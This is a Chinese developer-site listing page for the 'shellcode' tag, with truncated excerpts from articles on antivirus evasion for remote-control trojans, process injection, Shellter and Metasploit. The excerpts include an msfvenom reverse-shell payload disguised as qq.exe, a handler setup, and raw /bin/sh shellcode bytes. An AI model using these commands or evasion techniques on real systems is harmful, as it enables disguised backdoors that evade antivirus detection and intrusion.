E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
shellcode
python进程注入
shellcode
importsysimportpsutilimportctypesfromctypesimport*PAGE_EXECUTE_READWRITE=0x00000040PROCESS_ALL_ACCESS=(0x000F0000|0x00100000|0xFFF)VIRTUAL_MEM=(0x1000|0x2000)kernel32=windll.kernel32pName=sys.argv[1]i
大囚长
·
2020-08-18 19:53
【免杀篇】远控免杀专题(26)-C、C++加载
shellcode
免杀(上)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载
shellcode
免杀介绍0x02C/C++源码编译方法1:指针执行(VT免杀率23/71)方法2:申请动态内存加载(VT免杀率
Agan '
·
2020-08-18 19:09
免杀篇
后渗透篇:Metasploit shellter免杀
Metasploitshellter免杀0x01Shellter介绍0x02案例演示0x03Metasploit&Shellter捆绑免杀Metasploitshellter免杀0x01Shellter介绍Shellter是一个动态的
shellcode
Agan '
·
2020-08-18 19:09
渗透测试
后渗透篇
免杀篇
【免杀篇】远控免杀专题(27)-C、C++加载
shellcode
免杀(中)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载
shellcode
免杀介绍方法6:XOR加密(VT免杀率15/71)方法7:base64加密法1(VT免杀率28/69)方法8
Agan '
·
2020-08-18 19:09
免杀篇
免杀的艺术:史上最全的汇编
Shellcode
的技巧(三)
本文讲的是免杀的艺术:史上最全的汇编
Shellcode
的技巧(三),我们在上一篇提到要要自定义
shellcode
,不过由于这是个复杂的过程,我们只能专门写一篇了,本文,我们将会给大家介绍
shellcode
weixin_33759269
·
2020-08-18 19:31
Python 加密
shellcode
免杀
Python加密
shellcode
免杀环境准备:Windows732位系统;
Shellcode
使用kalilinuxMetasploit生成
shellcode
Windows7需要安装的软件:Python2.7
PeiSylon
·
2020-08-18 19:33
内网安全
Shellcode
的原理及编写
1.
shellcode
原理
Shellcode
实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,
Shellcode
一般是作为数据发送给受攻击服务的。
maotoula
·
2020-08-18 19:15
编译PI远控
SHELLCODE
(VC++)加异或免杀(转载于网络)
来自暗组,但原贴有诸多语法错误,以下是修正后的编译法。一,直接编译:#include#pragmacomment(linker,"/OPT:NOWIN98")#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")#pragmacomment(linker,"/MERGE:.rdata=.text")//合并区
lidatou
·
2020-08-18 19:11
shellcode
Powershell免杀(远程加载
shellcode
)笔记
原文链接远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取
shellcode
的方式将恶意代码加载到内存执行即可。
jackslowf
·
2020-08-18 19:34
shellter免杀技术实战
Shellter是一个开源的免杀工具,利用动态
Shellcode
注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/实验环境:kalishellter_v6.9360putty.exe
replaceroot
·
2020-08-18 18:33
渗透相关
【免杀篇】远控免杀专题(33)-Ruby加载
shellcode
免杀(VT免杀率0-58)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Ruby加载
shellcode
介绍0x02Ruby嵌入
shellcode
(VT查杀率0/58)免杀能力一览表0x01Ruby加载
shellcode
Agan '
·
2020-08-18 18:26
免杀篇
【免杀篇】远控免杀专题(30)-Python加载
shellcode
免杀-8种方式(VT免杀率
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Python加载
shellcode
免杀介绍0x02通过py源码编译exe方法1:python加载C代码(VT免杀率19/70)方法2:py2exe
Agan '
·
2020-08-18 18:26
免杀篇
免杀
【免杀篇】远控免杀专题(32)-Go加载
shellcode
免杀-3种方式(VT免杀率7-70)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01GO加载
shellcode
介绍0x02Go嵌入
shellcode
(VT查杀率3/71)0x03Go加载器go-
shellcode
加载器(VT
Agan '
·
2020-08-18 18:26
免杀篇
免杀简述2(二次编译
shellcode
\远程加载
shellcode
\
shellcode
远程线程注入\内存申请优化\管道技术)
二次编译也可以理解成
shellcode
混淆,将
shellcode
执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。
Shanfenglan7
·
2020-08-18 18:09
免杀相关
安全
免杀简述1(花指令/改特征码/
shellcode
加载器)
杀毒软件查杀思路杀软常见扫描方式与技术1、扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。2、程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。3、修复技术:即是对恶意程序所损坏的文件进行还原4、急救盘杀毒:利用空白U盘制作急救启动盘,来检测电脑病毒。5、智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。6、全盘扫描:扫描电脑全部磁盘,耗时较长。7、勒索软件防护:保护电
Shanfenglan7
·
2020-08-18 18:38
免杀相关
安全
shellcode
的隐藏运行
学习
shellcode
程序设计时,在我们提取了
shellcode
以后,可以简单的实现其隐藏运行。一、
shellcode
的运行下面的这段代码,是简略的过程。
淡淡的琉璃
·
2020-08-18 11:47
shellcode
MSF-
Shellcode
生成和MS15-020 渗透利用
1、生成window下后门程序A.msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.86.130LPORT=4444-fexe>/qq.exe2、重新打开一个配置窗口useexploit/multi/handlersetpayloadswindows/meterpreter/reverse_tcpsetlhost192.168.200.1
Tee.
·
2020-08-17 20:46
木马的伪装与免杀
0x01:我们依靠msf生成简单的
shellcode
免杀msfvenom-pwindows/meterpreter/reverse_tcp-ax86--platformLHOST=XXXLPORT=XXX-ex86
梭哈王
·
2020-08-17 16:20
内网渗透
一步一步pwn路由器之rop技术实战
前言本文由本人首发于先知安全技术社区:https://xianzhi.aliyun.com/forum/user/5274这次程序也是DVRF里面的,他的路径是pwnable/
ShellCode
_Required
weixin_30509393
·
2020-08-17 15:06
meterpreter载荷执行过程及原理
DeepDiveIntoStagelessMeterpreterPayloads》一、什么是stagepayloadstagepayload是一种分段式的载荷运行方式,它的设计理念是为了满足二进制溢出漏洞利用过程中,由于内存地址中留给攻击者的布局
shellcode
redwand
·
2020-08-17 14:12
渗透
小爬虫,爬取
shellcode
shellcode
网站http://shell-storm.org/
shellcode
/使用在线网站http://tools.bugscaner.com/sitemapspider生成sitemap使用下面的代码写到
fkbugs
·
2020-08-17 14:02
一些记录
linux exec /bin/sh
shellcode
x86 and x86_64
x86xor%edx,%edxxor%eax,%eaxpush%eaxpush$0x68732f2fpush$0x6e69622fmov%esp,%ebxpush%eaxpush%ebxmov%esp,%ecxmov$0xb,%alint$0x80c风格unsignedcharbuf[]="\x33\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x
p0x1307
·
2020-08-17 13:36
linux
Exploit
DEP机制的保护原理
DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入
shellcode
时,程序会
iteye_4515
·
2020-08-17 12:33
Windows安全机制---数据执行保护:DEP机制
文章目录Windows安全机制数据执行保护:DEP机制原理绕过攻击未启用的DEP程序利用Re2Libc挑战DEP跳转到ZwSetInformationProcess函数将DEP关闭再转入
shellcode
每昔
·
2020-08-17 10:37
二进制漏洞
纯C++编写Win32/X64通用
Shellcode
注入csrss进程
标题:【原创】纯C++编写Win32/X64通用
Shellcode
注入csrss进程.作者:猪会被杀掉时间:2015-08-08,04:26:13链接:http://bbs.pediy.com/showthread.php
chaos444
·
2020-08-17 00:13
初探Meterpreter
仅仅是驻留在内存的
shellcode
。。大概长这个样子
ouyangbro
·
2020-08-16 17:32
安全
metasploit渗透测试指南-学习笔记-第二章
###3.
shellcode
:
shellcode
是在渗透攻击时作为攻击载荷运行的一组机器指令。###4.模块(module):在本书的上下文环境中,一个模块是指Me
happen.
·
2020-08-16 16:37
MS08067利用方法
一、实验目的及要求1.掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行
shellcode
代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。
Riker-k
·
2020-08-16 16:01
网络安全
渗透工具之msf
构造
shellcode
常用命令 ms
修炼到救赎
·
2020-08-16 14:30
linux
浅谈利用cs进行免杀的思路总结
include#include#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")//不显示窗口unsignedchar
shellcode
goddemondemongod
·
2020-08-16 14:31
安全
python
黑客攻防入门(一)缓冲区(堆栈)溢出
溢出的目的是重写程序的运行堆栈,使调用返回堆栈包含一个跳向预设好的程序的程序(代码),这个程序通常称为
shellcode
,通过这个
shellcode
就能获得如期的shell,更有可能获得root。
不断攀登的梦想
·
2020-08-16 13:45
学习
C
语言
运维相关
Linux基本
黑客攻防
Hook ZwQueryInformationProcess 函数使得异常处理可以在
shellcode
上执行
32位系统上当你的
shellcode
有使用__try__except进行处理时,系统最终会调用RtlIsValidHandler来判断异常处理函数是否有效,如果你希望处理异常应该是HookRtlIsValidHandler
nLif
·
2020-08-16 13:47
hook
Hook
网络安全-《黑客秘笈渗透测试实用指南(第2版)》工具安装部分
后门制造工厂●PatchPE,ELF,Mach-O二进制文件注入
shellcode
gitclonehttps://github.com/secretsquirrel/the-backdoor-factory
Coisini、
·
2020-08-16 13:37
安全开发
超星阅读器ActiveX缓冲区溢出漏洞利用-LoadPage
最开始我想到的利用方式"jmpesp"0---------------------256---------260-----------268--------------|填充NOP|jmpesp|数据填充|
shellcode
jiangmingfu
·
2020-08-16 13:11
Flash 零日漏洞复现(CVE-2018-4878)
项目地址:https://github.com/Sch01ar/CVE-2018-4878.git影响版本为:AdobeFlashPlayer
shellcode
.txt获取
shellcode
.txt的内容
andiao1218
·
2020-08-16 12:54
Metasploit使用后门程序渗透Windows
终端中运行veil-evasion输入list查看可用模块这里使用7)c/
shellcode
_inject/flatc输入use7generate1(default)回车选择默认的windows/meterpreter
盗才生
·
2020-08-16 11:23
kali
msf
使用metasploit进行渗透攻击步骤
(启用这个渗透攻击模块)3.showpayloads(作为攻击载荷的payload就是通常所说的
shellcode
)4.setpayloadxxx/xxx(设置攻击载荷,类型分为开放
叶落秋霜
·
2020-08-16 11:22
metasploit自学
Flash cve-2018-4878漏洞复现
本文讲解webflash钓鱼需要工具:flash安装包<=28版本web服务器kali+python利用脚本复现:先用kali生成一个
shellcode
文本打开复制全部下载python脚本https:/
过云
·
2020-08-16 11:10
shell
web
windows
python
linux
浅谈:渗透测试(红队)续集
无论是理解低级语言(机器代码和汇编语言),编写
shellcode
,创建自定义的C2二进制可执行文件,还是修改代码来隐藏恶意程序。编程能力确实会影响水平高度滴。
·临江仙
·
2020-08-16 11:40
渗透测试
端口复用技术
绿盟的san的一篇的文章介绍了渗透防火墙的
shellcode
,有兴趣的朋友可以参考一下:htt
weixin_33694172
·
2020-08-15 19:16
单字节缓冲区溢出
单字节缓冲区溢出通常的缓冲区溢出就是通过重写堆栈中储存的EIP的内容,来使程序跳转到我们的
shellcode
处去执行。其实,即使缓冲区只溢出一个字节的时候,也有可能去执行我们的代码。
iteye_3619
·
2020-08-15 14:50
最新心得---20181204
;认识threathunter运维的人可以帮忙问问....1.一句话搜哈跑非http/https/tcp协议:很多时候都需要powershellbitsadminmstha等链接远程执行;或者是载体(
shellcode
qq_27446553
·
2020-08-15 11:27
渗透测试优秀文章
C++实现PE文件添加新节区(加壳器)
最近潜心研究二进制安全,接触到了
shellcode
还有加壳脱壳有关的内容,于是心血来潮,想用自己不怎么成熟的编程功夫来实现写一个加壳器,并记录下代码编写过程中遇到的坑。
Pluviophile12138
·
2020-08-15 09:50
C/C++
零基础逆向工程19_PE结构03_代码节空白区添加代码_
shellcode
1.获取MessageBox地址,构造
ShellCode
代码三种获取方法,参考文章末的一篇帖子。
weixin_30776863
·
2020-08-15 08:21
零基础逆向工程20_PE结构04_任意节空白区_新增节_扩大节添加代码
思路:八个步骤1.文件拷到文件缓冲区(FileBuffer)//图示见(零基础逆向工程18之PE加载过程)2.文件缓冲区扩展到内存映像缓冲区(ImageBuffer)3.判断代码空闲区是否有足够空间存储
ShellCode
weixin_30437337
·
2020-08-15 08:31
向节表空白区添加代码。
步骤如下:1、获取MessageBox地址,构造
ShellCode
代码.2、E8E9计算公式3
LittleCracker
·
2020-08-15 05:21
PE
[0day安全-学习总结]第三章开发
shellcode
的艺术之shellocde编码解码原理
自己大概地梳理了一下逻辑,下面再次总结一下:1.编写用于攻击的汇编代码
shellcode
_asm.c,经过c内联汇编,然后编译,在OD中得到汇编对应的十六进制代码,此即为
shellcode
_sc2.按框
jayxujia123
·
2020-08-14 17:56
软件测试&模糊测试&信息安全
pwnable.tw 题解笔记
题目orw考察写
shellcode
题目只允许使用read/write/open.系统调用表:https://introspelliam.github.io/2017/08/06/%E7%B3%BB%E7%
朝向高处的旅途
·
2020-08-14 01:05
return-to-libc攻击实验
第一部分实验背景缓冲区溢出的常用攻击方法是用
shellcode
的地址来覆盖漏洞程序的返回地址,使得漏洞程序去执行存放在栈中
shellcode
。
stonesharp
·
2020-08-14 01:25
杂类
Return-to-libc攻击实验
Return-to-libc攻击实验一、实验描述缓冲区溢出的常用攻击方法是用
shellcode
的地址来覆盖漏洞程序的返回地址,使得漏洞程序去执行存放在栈中
shellcode
。
qq_29687403
·
2020-08-14 01:06
Seed实验
上一页
6
7
8
9
10
11
12
13
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他